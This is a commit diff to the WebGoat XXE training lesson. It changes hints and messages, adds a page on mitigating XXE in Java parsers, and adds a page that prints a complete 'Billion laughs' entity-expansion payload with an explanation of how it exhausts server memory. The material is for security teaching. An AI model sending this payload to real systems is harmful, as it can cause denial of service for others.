XXE checkin

webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/SimpleXXE.java

@@ -59,7 +59,7 @@ public String getPath() {
     public AttackResult createNewUser(@RequestBody String userInfo) throws Exception {
         User user = parseXml(userInfo);
         if (checkSolution(user)) {
-          return AttackResult.success(String.format("Welcome %s", user.getUsername()));
+          return AttackResult.success(String.format("Congratulation, welcome %s", user.getUsername()));
         }
         return AttackResult.failed("Try again!");
     }

webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/XXE.java

@@ -45,9 +45,8 @@ public Category getDefaultCategory() {
     @Override
     public List<String> getHints() {
         List<String> hints = new ArrayList<String>();
-        hints.add("Try searching with BOS, SFO or OAK");
+        hints.add("Try submitting the form and see what happens");
         hints.add("XXE stands for XML External Entity attack");
-        hints.add("Look at the search form when you submit");
         hints.add("Try to include your own DTD");
         return hints;
     }

webgoat-lessons/xxe/src/main/resources/plugin/XXE/html/XXE.html

@@ -49,9 +49,10 @@
                         </tr>
                     </table>
                     <br/>
-                    <strong>By signing up you agree to WebGoat's Terms of Service.</strong>
                     <br/>
                 </form>
+                <div class="attack-feedback"></div>
+                <div class="attack-output"></div>
             </div>
         </form>
         <div id='registration_success'></div>
@@ -97,13 +98,29 @@
                         </tr>
                     </table>
                     <br/>
-                    <strong>By signing up you agree to WebGoat's Terms of Service.</strong>
                     <br/>
                 </form>
+                <div class="attack-feedback"></div>
+                <div class="attack-output"></div>
             </div>
         </form>
     </div>
 </div>
 
 
+<div class="lesson-page-wrapper">
+    <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+    <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
+    which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+    <div class="adoc-content" th:replace="doc:XXE_overflow.adoc"></div>
+</div>
+
+<div class="lesson-page-wrapper">
+    <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+    <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
+    which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+    <div class="adoc-content" th:replace="doc:XXE_mitigation.adoc"></div>
+</div>
+
+
 </html>

webgoat-lessons/xxe/src/main/resources/plugin/XXE/lessonPlans/en/XXE_changing_content_type.adoc

@@ -1,4 +1,7 @@
 == Modern REST framework
 
-Again same exercise but try to enforce the same XML injection as we did in first lesson.
+In modern REST frameworks the server might be able to accepts data formats that you as a developer did not think about.
+So this might result in JSON endpoints being vulnerable for XXE attacks.
+
+Again same exercise but try to perform the same XML injection as we did in first lesson.
 

webgoat-lessons/xxe/src/main/resources/plugin/XXE/lessonPlans/en/XXE_mitigation.adoc

@@ -0,0 +1,21 @@
+== XXE mitigation
+
+In order to protect against XXE attacks you need to make sure you validate the input received from an untrusted client.
+In the Java world you can also instruct your parser to ignore DTD completely, for example:
+
+[source]
+----
+XMLInputFactory xif = XMLInputFactory.newFactory();
+xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+----
+
+if you are not able to completely switch off the DTD support, you can also instruct the XML parser to ignore external entities, like:
+
+[source]
+----
+XMLInputFactory xif = XMLInputFactory.newFactory();
+xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+xif.setProperty(XMLInputFactory.SUPPORT_DTD, true);
+----
+
+For more information about configuration, see https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet

webgoat-lessons/xxe/src/main/resources/plugin/XXE/lessonPlans/en/XXE_overflow.adoc

@@ -0,0 +1,30 @@
+== XXE DOS attack
+
+With the same XXE attack we can perform a DOS service attack towards the server. An example of such an attack is:
+
+[source]
+----
+<?xml version="1.0"?>
+<!DOCTYPE lolz [
+ <!ENTITY lol "lol">
+ <!ELEMENT lolz (#PCDATA)>
+ <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
+ <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
+ <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
+ <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
+ <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
+ <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
+ <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
+ <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
+ <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
+]>
+<lolz>&lol9;</lolz>
+----
+
+When XML parser loads this document, it sees that it includes one root element, "lolz", that contains the text "&lol9;". However, "&lol9;" is a defined
+entity that expands to a string containing ten "&lol8;" strings. Each "&lol8;" string is a defined entity that expands to ten "&lol7;" strings, and so on.
+After all the entity expansions have been processed, this small (< 1 KB) block of XML will actually contain 109 = a billion "lol"s, taking up almost 3
+gigabytes of memory.
+
+This is called a "Billion laughs", more information can be found here: https://en.wikipedia.org/wiki/Billion_laughs
+